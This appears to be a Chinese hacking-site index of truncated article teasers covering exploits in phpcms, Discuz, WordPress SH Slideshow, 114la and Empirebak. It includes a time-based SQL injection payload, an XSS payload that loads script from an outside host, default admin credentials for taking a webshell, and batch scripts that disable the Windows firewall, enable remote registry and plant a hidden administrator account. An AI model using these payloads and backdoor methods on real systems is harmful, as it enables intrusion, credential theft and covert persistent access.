phpcms 2008 sp4 comment.php页面SQL注入漏洞分析
影响版本: phpcms 2008 sp4 官方地址:www.phpcms.cn 漏洞描述: 问题出在/comment/include/comment.class.php中关于function ajaxupdate($field, $id)的定义: 程序59行开始: function ajaxupdate( $field, $id ) { $sql = “UPDATE $this->_commen...
Discuz 1.5 配合NGINX二次解析爆路径BUG
作者:晴天小铸 测试环境:discuz X1.5+nginx 1.0 漏洞文件source/function/function_core.php,代码: $_G['setting']['domain']['app']['default'] && $content = preg_replace("/ 利用代码: https://www.webshell.cc/forum.php/adm...
最好的入侵检测linux教程
一:基本知识 1:常见UNIX版本: SCO UNIX,Sunos,Solaris,HP-UX,Digtal,Unix,IRIX,AIX,Linux,FreeBSD, 386BSD,A/UX,BSD,BSD-LITE,Goherent,Dynix,Hurd(GNN),InTeractive,Mach,Minix,Mks Toolkit,NetNSD,OSF/I,System V Un...
WordPress插件SH Slideshow
标题: WordPress SH Slideshow plugin 1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20 --------------- 缺陷代码分析 --------------- $result = $wpdb->query('delete from sh_slides where id = '.$_POS...
命令行下建立VPN
@echo off rem preparation sc config sharedaccess start= disabled net stop SharedAccess sc config remoteaccess start= auto net start RemoteAccess net start lanmanserver net start RemoteRegistry rem bui...
ASP构造注入点继续注入
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去 <!--#include file="xx.asp"--> <% set rs=server.createobject("ADODB.recordset") id = request("id") strS...
114啦网址导航留言本注入漏洞
雨林木风的114啦网址导航程序留言文件存在注入漏洞。攻击者利用EXP 可以得到管理员帐号和MD5密码。 版本:<=1.5 EXP如下: <?php $sbcopyright=' ---------------------------------------- 114la feedback injection Vul Exploit By xZL Team: www.0kee.com 2...
康盛旗下网站主机网站存在XSS
描述:XSS很邪恶~ 详细说明:http://www.verydz.com/login.php?goto_page="><script src=https://www.webshell.cc/test.js></script>
帝国备份王(Empirebak)拿webshell
帝国备份王(Empirebak)简介 EmpireBak是一款完全免费、专门为Mysql大数据的备份与导入而设计的软件,系统采用分卷备份与导入,理论上可备份任何大小的数据库. 可在 http://www.phome.net/ebak2008os/ 下载到 默认账号密码为 admin 123456 登陆后先备份一次数据 备份时可选择备份到的目录。。默认有个safemod 当然也可以是别的..这里以s...
复制并真正隐藏administrator帐号(完全批处理)
网上看了很多复制administator权限帐号的方法或者工具,比如建立admin$,所谓的隐藏帐号。 并复制administrator的权限。 其实这是暂时、一次性隐藏而已,服务器重启一下通过“计算机管理”或者net user 都能看到的。 本批处理根据服务器的情况,结合自己的研究,使用服务器本地iis帐号IUSR_计算机名, 设置密码位12345678(可以自己改一下批处理最后一行)。 这个来...